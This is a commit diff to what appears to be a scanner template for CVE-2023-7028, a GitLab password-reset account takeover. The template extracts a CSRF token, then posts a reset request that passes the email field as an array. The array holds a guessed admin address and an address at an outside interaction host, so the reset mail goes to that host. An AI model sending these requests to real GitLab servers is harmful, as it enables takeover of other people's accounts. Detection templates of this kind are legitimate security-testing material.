misc updates

2024-01-14 17:46:26 +05:30 · 2024-01-14 17:46:26 +05:30 · 16b6079a48
parent aab1f47ba1
commit 16b6079a48
1 changed files with 22 additions and 27 deletions
--- a/http/cves/2023/CVE-2023-7028.yaml
+++ b/http/cves/2023/CVE-2023-7028.yaml
@ -1,7 +1,7 @@
 id: CVE-2023-7028

 info:
-  name: GitLab Account Takeover via Password Reset without user interactions
+  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: critical
  description: |
@ -9,6 +9,13 @@ info:
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
+    - https://hackerone.com/reports/2293343
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10
+    cve-id: CVE-2023-7028
+    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 2
@ -16,9 +23,9 @@ info:
    product: gitlab
    shodan-query: title:"Gitlab"
  tags: cve,cve2023,gitlab,auth-bypass
-
 flow: |
  http(1);
+  set("token", template["token"][0]);
  http(2);

 http:
@ -27,25 +34,8 @@ http:
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

-      - |
-        @timeout: 30s
-        POST /users/password HTTP/1.1
-        Host: {{Hostname}}
-        Origin: {{RootURL}}
-        Content-Type: application/x-www-form-urlencoded
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-        Referer: {{RootURL}}/users/password/new
-
-        authenticity_token={{token}}&user[email][]=admin@example.com&user[email][]=nuclei@{{interactsh-url}}
-
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(interactsh_protocol, 'smtp')"
-
    extractors:
      - type: regex
-        part: body
        name: token
        group: 1
        regex:
@ -54,24 +44,29 @@ http:

  - raw:
      - |
-        @timeout: 30s
+        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: {{RootURL}}/users/password/new

-        authenticity_token={{token}}&user[email][]={{username}}@{{RDN}}&user[email][]=nuclei@{{interactsh-url}}
+        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}

    payloads:
      username:
-        - admin
-        - root
-        - gitlab
-        - git
+        - admin@example.com
+        - admin@{{RDN}}
+        - root@{{RDN}}
+        - gitlab@{{RDN}}
+        - git@{{RDN}}

    matchers:
      - type: dsl
        dsl:
-          - "contains(interactsh_protocol, 'smtp')"
+          - contains(interactsh_protocol, 'smtp')
+
+    extractors:
+      - type: dsl
+        dsl:
+          - username